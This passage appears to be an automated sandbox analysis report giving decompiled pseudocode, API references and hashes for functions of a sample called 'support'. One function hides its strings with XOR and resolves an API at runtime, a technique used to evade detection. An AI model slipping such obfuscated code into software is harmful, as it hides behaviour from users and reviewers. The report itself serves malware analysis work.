							 *((intOrPtr*)(_t78 + 0x10)) = _v12;
							 *(_t78 + 0x14) = _t111;
							_t111 = _t99 + _t92;
							_v12 = _t111;
							_v8 = _t111 + _a16;
							_push(_t92);
							if(_v16 < 0x10) {
								L18:
								memcpy(_t99, _t78, ??);
								memcpy(_t111, _v20, _a16);
								 *_v8 = 0;
								 *_t78 = _t99;
								return _t78;
							} else {
								_t113 =  *_t78;
								memcpy(_t99, _t113, ??);
								memcpy(_v12, _v20, _a16);
								_t70 = _v8;
								_t118 = _t118 + 0x18;
								_t91 = _v16 + 1;
								 *_v8 = 0;
								if(_t91 < 0x1000) {
									L16:
									_push(_t91);
									E003BE78C(_t70, _t113);
									 *_t78 = _t99;
									return _t78;
								} else {
									_t94 =  *(_t113 - 4);
									_t91 = _t91 + 0x23;
									_t111 = _t113 - _t94;
									_t31 = _t111 - 4; // 0x7ffffffb
									_t70 = _t31;
									if(_t31 > 0x1f) {
										goto L17;
									} else {
										_t113 = _t94;
										goto L16;
									}
								}
							}
						}
					}
				}
				L31:
			}

0x003b5af9
0x003b5afa
0x003b5afc
0x003b5b07
0x003b5b0c
0x003b5b0f
0x003b5b12
0x003b5b15
0x003b5c44
0x003b5c49
0x003b5c4a
0x003b5c4b
0x003b5c4c
0x003b5c4d
0x003b5c4e
0x003b5c4f
0x003b5c51
0x003b5c53
0x003b5c54
0x003b5c58
0x003b5cab
0x003b5cad
0x003b5c5a
0x003b5c5a
0x003b5c5b
0x003b5c60
0x003b5c60
0x003b5c65
0x00000000
0x003b5c67
0x003b5c67
0x003b5c6a
0x003b5c71
0x003b5c85
0x003b5c85
0x003b5c87
0x003b5c8c
0x00000000
0x003b5c73
0x003b5c73
0x003b5c76
0x003b5c81
0x003b5cae
0x003b5cb4
0x003b5cb5
0x003b5cb6
0x003b5cb7
0x003b5cb8
0x003b5cb9
0x003b5cba
0x003b5cbb
0x003b5cbc
0x003b5cbd
0x003b5cbe
0x003b5cbf
0x003b5cc4
0x003b5cc6
0x003b5ccd
0x003b5cd3
0x003b5cde
0x003b5ce7
0x003b5cf1
0x003b5c83
0x003b5c83
0x00000000
0x003b5c83
0x003b5c81
0x003b5c71
0x00000000
0x003b5c8f
0x003b5c8f
0x003b5c96
0x003b5c9c
0x003b5ca0
0x003b5ca3
0x003b5ca3
0x003b5ca6
0x00000000
0x003b5caa
0x003b5b1b
0x003b5b1b
0x003b5b1e
0x003b5b23
0x003b5b26
0x003b5b29
0x003b5b2c
0x003b5b2e
0x003b5b36
0x003b5b3c
0x003b5b49
0x003b5b3e
0x003b5b3e
0x003b5b3e
0x003b5b30
0x003b5b30
0x003b5b30
0x003b5b58
0x003b5b60
0x003b5b8e
0x003b5ba0
0x003b5b90
0x003b5b90
0x003b5b91
0x003b5b96
0x003b5b99
0x003b5b9c
0x003b5b9c
0x00000000
0x003b5b62
0x003b5b62
0x003b5b62
0x003b5b6a
0x003b5b6d
0x003b5b6e
0x003b5b73
0x003b5b78
0x003b5c15
0x003b5c15
0x00000000
0x003b5b7e
0x003b5b7e
0x003b5b81
0x003b5b84
0x003b5b87
0x003b5ba2
0x003b5ba5
0x003b5bab
0x003b5bae
0x003b5bb3
0x003b5bba
0x003b5bbd
0x003b5bbe
0x003b5c1b
0x003b5c1d
0x003b5c29
0x003b5c34
0x003b5c39
0x003b5c41
0x003b5bc0
0x003b5bc0
0x003b5bc4
0x003b5bd2
0x003b5bd7
0x003b5bda
0x003b5be0
0x003b5be1
0x003b5bea
0x003b5bfe
0x003b5bfe
0x003b5c00
0x003b5c08
0x003b5c12
0x003b5bec
0x003b5bec
0x003b5bef
0x003b5bf2
0x003b5bf4
0x003b5bf4
0x003b5bfa
0x00000000
0x003b5bfc
0x003b5bfc
0x00000000
0x003b5bfc
0x003b5bfa
0x003b5bea
0x003b5bbe
0x003b5b78
0x003b5b60
0x00000000

APIs

memcpy.VCRUNTIME140(00000000,7FFFFFFF,?,?,?), ref: 003B5BC4
memcpy.VCRUNTIME140(?,?,?,00000000,7FFFFFFF,?,?,?), ref: 003B5BD2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?), ref: 003B5C15
memcpy.VCRUNTIME140(00000000,?,?,?,?), ref: 003B5C1D
memcpy.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,?,?,?), ref: 003B5C29

Part of subcall function 003BE3E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(006F5B9C,?,003B5E90,00000000,?,006F5B9C), ref: 003BE3F6

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 996696-0
Opcode ID: 159677933ae3f0bd5972e2356f047f632543fb60d98b2232dc204f1f930a3d39
Instruction ID: 19e249dc682d47f6afe7a4c1b7f903eb5e2e361bf3e83d1286cd3832d187aa79
Opcode Fuzzy Hash: 159677933ae3f0bd5972e2356f047f632543fb60d98b2232dc204f1f930a3d39
Instruction Fuzzy Hash: 1441F472A005149FCB16DF6CCC80AEEBBA5EF84314F1506B9EA15EB641DB30DE119B91

Uniqueness

Uniqueness Score: -1.00%

Function 003B8460 Relevance: 7.6, APIs: 5, Instructions: 97
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003B8460(intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMIDIOUT__* _t21;
				int _t22;
				struct HMIDISTRM__* _t27;
				int _t30;
				int _t34;
				struct HMIDIOUT__** _t36;
				struct HMIDIOUT__** _t46;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __ecx;
				_t46 = __ecx + 0x50;
				if( *((intOrPtr*)(__ecx + 0x18)) != 0 ||  *_t46 != 0xc8) {
					_t36 = _t46;
					 *(_t48 + 0x4c) = 0;
					 *(_t48 + 0x18) = 0;
					_t21 =  *_t36;
					if(_t21 != 0xc8 && _t21 != 0x12c) {
						 *_t36 = 0x64;
					}
					_t22 = midiStreamStop( *(_t48 + 0x1c));
					if(_t22 == 0) {
						_t22 = midiOutReset( *(_t48 + 0x1c));
						if(_t22 != 0) {
							goto L6;
						} else {
							if(WaitForSingleObject( *(_t48 + 0x54), 0x7d0) == 0x102) {
								 *_t36 = 0xc8;
							}
							if( *_t46 != 0xc8) {
								goto L26;
							} else {
								goto L12;
							}
						}
					} else {
						L6:
						 *((intOrPtr*)( *_t48 + 4))(_t22);
						goto L7;
					}
				} else {
					L12:
					 *_t46 = 0;
					if( *(_t48 + 0x3c) != 0) {
						_t36 = midiOutUnprepareHeader;
						_t47 = 0;
						do {
							_t34 = midiOutUnprepareHeader( *(_t48 + 0x1c),  *((intOrPtr*)(_t48 + 0x74)) + _t47, 0x40);
							if(_t34 != 0) {
								 *((intOrPtr*)( *_t48 + 4))(_t34);
							}
							_t47 = _t47 + 0x54;
						} while (_t47 < 0xa8);
						 *(_t48 + 0x3c) = 0;
					}
					_t27 =  *(_t48 + 0x1c);
					if(_t27 != 0) {
						_t30 = midiStreamClose(_t27);
						if(_t30 != 0) {
							 *((intOrPtr*)( *_t48 + 4))(_t30);
						}
						 *(_t48 + 0x1c) = 0;
					}
					if(_a4 == 0) {
						L26:
						return 1;
					} else {
						if(E003B8EE0(_t36, _t48, _t46, _t48) == 0) {
							L7:
							return 0;
						} else {
							if( *((intOrPtr*)(_t48 + 0x24)) == 0) {
								E003B8590(_t48);
								 *(_t48 + 0x20) = 0;
								 *(_t48 + 0x88) = 0;
							}
							goto L26;
						}
					}
				}
			}

0x003b8465
0x003b846c
0x003b846f
0x003b8479
0x003b847b
0x003b8482
0x003b8489
0x003b8490
0x003b8499
0x003b8499
0x003b84a2
0x003b84aa
0x003b84c0
0x003b84c8
0x00000000
0x003b84ca
0x003b84dd
0x003b84df
0x003b84df
0x003b84eb
0x00000000
0x00000000
0x00000000
0x00000000
0x003b84eb
0x003b84ac
0x003b84ac
0x003b84b1
0x00000000
0x003b84b1
0x003b84f1
0x003b84f1
0x003b84f5
0x003b84fb
0x003b84fd
0x003b8503
0x003b8505
0x003b8510
0x003b8514
0x003b851b
0x003b851b
0x003b851e
0x003b8521
0x003b8529
0x003b8529
0x003b8530
0x003b8535
0x003b8538
0x003b8540
0x003b8547
0x003b8547
0x003b854a
0x003b854a
0x003b8555
0x003b8586
0x003b858d
0x003b8557
0x003b8560
0x003b84b6
0x003b84ba
0x003b8566
0x003b856a
0x003b856e
0x003b8573
0x003b857a
0x003b857a
0x00000000
0x003b856a
0x003b8560
0x003b8555

APIs

midiStreamStop.WINMM(?,?,?,?,?,?,?,?,?,003B8193,00000000,4B5EE95B,?,?,?,003BF980), ref: 003B84A2
midiOutReset.WINMM(?,?,?,?,?,?,?,?,?,003B8193,00000000,4B5EE95B,?,?,?,003BF980), ref: 003B84C0
WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,?,?,?,?,?,003B8193,00000000,4B5EE95B), ref: 003B84D2
midiOutUnprepareHeader.WINMM(?,?,00000040,?,?,?,?,?,?,?,?,003B8193,00000000,4B5EE95B), ref: 003B8510
midiStreamClose.WINMM(?,?,?,?,?,?,?,?,?,003B8193,00000000,4B5EE95B,?,?,?,003BF980), ref: 003B8538

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: midi$Stream$CloseHeaderObjectResetSingleStopUnprepareWait
String ID:
API String ID: 2236374465-0
Opcode ID: 020b3bb927526ec14eddd9e0d406e38906071320b47eb34bd4b6c2bb0cdfeebd
Instruction ID: e3fae5170deab17d22173d6e69bde9bf959af1f8bded43bae3d0c90993002572
Opcode Fuzzy Hash: 020b3bb927526ec14eddd9e0d406e38906071320b47eb34bd4b6c2bb0cdfeebd
Instruction Fuzzy Hash: CE314D712007018FEB729F16D888B97BBEDEF41318F15491AD245C6A91CFB9E845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003BD3D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E003BD3D0(void* __ecx, void* __edi, void* __esi, char* _a4, int _a8, signed int _a12) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _t31;
				int _t35;
				int _t36;
				intOrPtr _t42;
				intOrPtr _t43;
				char* _t47;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				int _t56;
				struct _IO_FILE* _t58;
				intOrPtr _t60;
				void* _t63;
				signed int _t64;

				_t31 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t31 ^ _t64;
				_t63 = __ecx;
				_t47 = _a4;
				_t58 =  *(__ecx + 0x4c);
				if(_t58 == 0) {
					L9:
					return E003BE3D0(_v8 ^ _t64);
				} else {
					_t56 = _a8;
					if(_t47 != 0 || (_t56 | _a12) != 0) {
						_t35 = 0;
					} else {
						_t35 =  &(_t47[4]);
					}
					_t36 = setvbuf(_t58, _t47, _t35, _t56);
					if(_t36 != 0) {
						goto L9;
					} else {
						_t60 =  *((intOrPtr*)(_t63 + 0x4c));
						 *((char*)(_t63 + 0x48)) = 1;
						 *(_t63 + 0x3d) = _t36;
						__imp__?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ();
						if(_t60 != 0) {
							_v12 = 0;
							_v16 = 0;
							_v20 = 0;
							__imp___get_stream_buffer_pointers(_t60,  &_v12,  &_v16,  &_v20);
							_t42 = _v12;
							_t55 = _v20;
							 *((intOrPtr*)(_t63 + 0xc)) = _t42;
							 *((intOrPtr*)(_t63 + 0x10)) = _t42;
							_t43 = _v16;
							 *((intOrPtr*)(_t63 + 0x1c)) = _t43;
							 *((intOrPtr*)(_t63 + 0x20)) = _t43;
							 *((intOrPtr*)(_t63 + 0x2c)) = _t55;
							 *((intOrPtr*)(_t63 + 0x30)) = _t55;
						}
						_t51 =  *0x6f6394; // 0x0
						 *((intOrPtr*)(_t63 + 0x4c)) = _t60;
						 *((intOrPtr*)(_t63 + 0x40)) = _t51;
						_t52 =  *0x6f6398; // 0x0
						 *((intOrPtr*)(_t63 + 0x44)) = _t52;
						 *((intOrPtr*)(_t63 + 0x38)) = 0;
						return E003BE3D0(_v8 ^ _t64);
					}
				}
			}

0x003bd3d6
0x003bd3dd
0x003bd3e1
0x003bd3e3
0x003bd3e7
0x003bd3ec
0x003bd4a8
0x003bd4b9
0x003bd3f2
0x003bd3f2
0x003bd3f7
0x003bd405
0x003bd400
0x003bd400
0x003bd400
0x003bd40b
0x003bd416
0x00000000
0x003bd41c
0x003bd41c
0x003bd421
0x003bd425
0x003bd428
0x003bd430
0x003bd435
0x003bd440
0x003bd44b
0x003bd454
0x003bd45a
0x003bd460
0x003bd463
0x003bd466
0x003bd469
0x003bd46c
0x003bd46f
0x003bd472
0x003bd475
0x003bd475
0x003bd478
0x003bd480
0x003bd483
0x003bd486
0x003bd48d
0x003bd490
0x003bd4a5
0x003bd4a5
0x003bd416

APIs

setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,?), ref: 003BD40B
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 003BD428
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,?), ref: 003BD454

Strings

[^K/, xrefs: 003BD3D6

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@_get_stream_buffer_pointerssetvbuf
String ID: [^K/
API String ID: 2761198109-4166871755
Opcode ID: 55ebf89387eb403a78288872f70c1ae5a9ca4baa00c9f1971d0c439a11a6a728
Instruction ID: dc60cca86a0d3bfed112e4939f74e7f463d6eb74f2402e696ad0859284215921
Opcode Fuzzy Hash: 55ebf89387eb403a78288872f70c1ae5a9ca4baa00c9f1971d0c439a11a6a728
Instruction Fuzzy Hash: 1F315A75A002089FD725CF69D840AAAFBF9FF88304F00895EE946D3700EB71B900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 003BD2B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(4B5EE95B,00000000,?,?,00000000,003BFED0,000000FF), ref: 003BD335
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000000,003BFED0,000000FF), ref: 003BD33E
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000000,003BFED0,000000FF), ref: 003BD346

Strings

[^K/, xrefs: 003BD2C4

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@
String ID: [^K/
API String ID: 4286870943-4166871755
Opcode ID: f822fce9a797aac02e181f576802e6a02a32fba358d5eb9eb83ac264bf492305
Instruction ID: dace647aeb93c00d91aa02816c6df783387e94a672bec87040041ec82d2c923e
Opcode Fuzzy Hash: f822fce9a797aac02e181f576802e6a02a32fba358d5eb9eb83ac264bf492305
Instruction Fuzzy Hash: F5216775A0820ACFC716CF19D884EA8FBF8FB4A318F044169E50AC7761EB30A955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003B64D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E003B64D0() {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				signed char _v20;
				char _v23;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v35;
				char _v36;
				void* _t23;
				void* _t24;
				_Unknown_base(*)()* _t27;
				signed char _t29;
				signed char _t30;
				void* _t32;

				_t29 = 0x3e;
				_v20 = 0x57467b3e;
				_v16 = 0x514c6e4a;
				_t23 = 0;
				_v12 = 0x4d4d5b5d;
				_v8 = 0;
				while(1) {
					 *(_t32 + _t23 - 0xf) =  *(_t32 + _t23 - 0xf) ^ _t29;
					_t23 = _t23 + 1;
					if(_t23 >= 0xb) {
						break;
					}
					_t29 = _v20;
				}
				_v8 = 0;
				_t30 = 0x49;
				_v36 = 0x3b2c2249;
				_t24 = 0;
				_v32 = 0x7a252c27;
				_v28 = 0x252d677b;
				_v24 = 0x25;
				while(1) {
					 *(_t32 + _t24 - 0x1f) =  *(_t32 + _t24 - 0x1f) ^ _t30;
					_t24 = _t24 + 1;
					if(_t24 >= 0xc) {
						break;
					}
					_t19 =  &_v36; // 0x3b2c2249
					_t30 =  *_t19;
				}
				_v23 = 0;
				_t27 = GetProcAddress(GetModuleHandleA( &_v35),  &_v19);
				return  *_t27(0);
			}

0x003b64d6
0x003b64d8
0x003b64df
0x003b64e6
0x003b64e8
0x003b64ef
0x003b64f3
0x003b64f3
0x003b64f7
0x003b64fb
0x00000000
0x00000000
0x003b64fd
0x003b64fd
0x003b6502
0x003b6506
0x003b6508
0x003b650f
0x003b6511
0x003b6518
0x003b651f
0x003b6525
0x003b6525
0x003b6529
0x003b652d
0x00000000
0x00000000
0x003b652f
0x003b652f
0x003b652f
0x003b6537
0x003b6547
0x003b6554

APIs

GetModuleHandleA.KERNEL32(?), ref: 003B653C
GetProcAddress.KERNEL32(00000000,003B6695), ref: 003B6547

Strings

][MM, xrefs: 003B64E8
I",;',%z{g-%%>{FWJnLQ][MM, xrefs: 003B652F

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: I",;',%z{g-%%>{FWJnLQ][MM$][MM
API String ID: 1646373207-2769448558
Opcode ID: 326434b5f97fbf055246f7cb65761401fb4a52944efe22d6ed8253eb4d94188f
Instruction ID: 7333a6e549560a63a323a1687c74cf61bbc10751ab2dd03d9d7812adc7591566
Opcode Fuzzy Hash: 326434b5f97fbf055246f7cb65761401fb4a52944efe22d6ed8253eb4d94188f
Instruction Fuzzy Hash: C601BC70C0429DDACF42CFE998497FFBFB8BB06704F208988C556EB646D6789205CB95

Uniqueness

Uniqueness Score: -1.00%

Function 003B3A00 Relevance: 6.1, APIs: 4, Instructions: 96
sleepCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E003B3A00() {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				signed int _t33;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr _t53;
				signed int _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr* _t73;

				while(1) {
					_t33 =  *0x6f62f0; // 0x12
					_t67 =  *0x6f6304; // 0xc9c330
					_t34 =  *0x6f62f7; // 0x0
					_t53 =  *((intOrPtr*)(_t67 + (_t33 * 8 - _t33) * 4));
					if(_t53 != 1 || _t34 != 0) {
						goto L3;
					}
					L5:
					_t65 =  *0x6f6308; // 0xc9c790
					 *0x6f62f0 = rand() % (((0x92492493 * (_t65 - _t67) >> 0x20) + _t65 - _t67 >> 4 >> 0x1f) + ((0x92492493 * (_t65 - _t67) >> 0x20) + _t65 - _t67 >> 4));
					Sleep(0x64);
					continue;
					L3:
					if(_t53 == 0 && _t34 != 0) {
						goto L5;
					}
					__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
					_v8 = 0;
					_v12 = 0xa;
					_v8 = 0;
					_v10 = 0x2d;
					_v11 = 0x20;
					_v9 = 0x20;
					_t37 = E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v11);
					_t57 =  *0x6f62f0; // 0x12
					_t72 = _t57 * 8 - _t57;
					_t58 =  *0x6f6304; // 0xc9c330
					_t59 = _t58 + 4;
					_t73 = _t59 + _t72 * 4;
					_t60 =  *((intOrPtr*)(_t73 + 0x10));
					if( *((intOrPtr*)(_t59 + 0x14 + _t72 * 4)) >= 0x10) {
						_t73 =  *_t73;
					}
					E003B61D0(_t37, _t73, _t60);
					__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
					_v8 = 0;
					_v8 = 0;
					_v12 = 0x54;
					_v10 = 0x20;
					_v11 = 0x20;
					_v9 = 0x20;
					return E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v11);
				}
			}

0x003b3a15
0x003b3a15
0x003b3a1a
0x003b3a29
0x003b3a2e
0x003b3a34
0x00000000
0x00000000
0x003b3a42
0x003b3a42
0x003b3a65
0x003b3a6b
0x00000000
0x003b3a3a
0x003b3a3c
0x00000000
0x00000000
0x003b3a7a
0x003b3a82
0x003b3a88
0x003b3a8d
0x003b3a97
0x003b3a9c
0x003b3aa8
0x003b3aab
0x003b3ab0
0x003b3abd
0x003b3abf
0x003b3ac5
0x003b3acd
0x003b3ad0
0x003b3ad3
0x003b3ad5
0x003b3ad5
0x003b3ada
0x003b3ae9
0x003b3af1
0x003b3af7
0x003b3afd
0x003b3b06
0x003b3b0b
0x003b3b17
0x003b3b25
0x003b3b25

APIs

rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 003B3A5D
Sleep.KERNEL32(00000064), ref: 003B3A6B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3A7A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(003B5660), ref: 003B3AE9

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$Sleeprand
String ID:
API String ID: 1082973050-0
Opcode ID: badfee52798a85eb28eb3c5618284c0f1dbea554afe8001ce3d83b5081c078ee
Instruction ID: 89048c5705852bda9506bb128d4b5e090e4653a8bf47cfe96d41272ae6a18895
Opcode Fuzzy Hash: badfee52798a85eb28eb3c5618284c0f1dbea554afe8001ce3d83b5081c078ee
Instruction Fuzzy Hash: 01314E31B012949FCF0ACF78E8A0AE97B67A79330CF1960A8D5014B753C6316B0DCB51

Uniqueness

Uniqueness Score: -1.00%

Function 003B5830 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E003B5830(void* __ebx, void* __edi, intOrPtr* _a4, int _a8) {
				void _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void _v32;
				void _v36;
				intOrPtr _v40;
				signed int _v72;
				intOrPtr _v80;
				signed int _v92;
				signed int _v104;
				intOrPtr _v120;
				void* __esi;
				signed int _t97;
				signed int _t98;
				int _t100;
				signed int _t105;
				void* _t115;
				intOrPtr _t116;
				void* _t122;
				signed int _t124;
				unsigned int _t126;
				void* _t127;
				void* _t142;
				void* _t143;
				void* _t145;
				unsigned int _t147;
				void* _t148;
				void* _t158;
				void* _t159;
				void* _t161;
				void _t166;
				void* _t167;
				intOrPtr _t169;
				void* _t172;
				signed int _t180;
				intOrPtr _t181;
				signed int _t183;
				intOrPtr _t190;
				intOrPtr* _t191;
				signed int _t196;
				void* _t198;
				signed int _t203;
				signed int _t205;
				void* _t207;
				signed int _t212;
				signed int _t213;
				intOrPtr _t214;
				void* _t215;
				void* _t217;
				intOrPtr* _t221;
				signed int _t223;
				void* _t225;
				signed int _t230;
				void* _t231;
				void* _t233;
				void* _t235;
				intOrPtr _t237;
				intOrPtr* _t238;
				intOrPtr* _t240;
				signed int _t243;
				void* _t244;
				void* _t246;
				void* _t248;
				void _t252;
				signed int _t254;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t261;
				void* _t262;

				_push(0xffffffff);
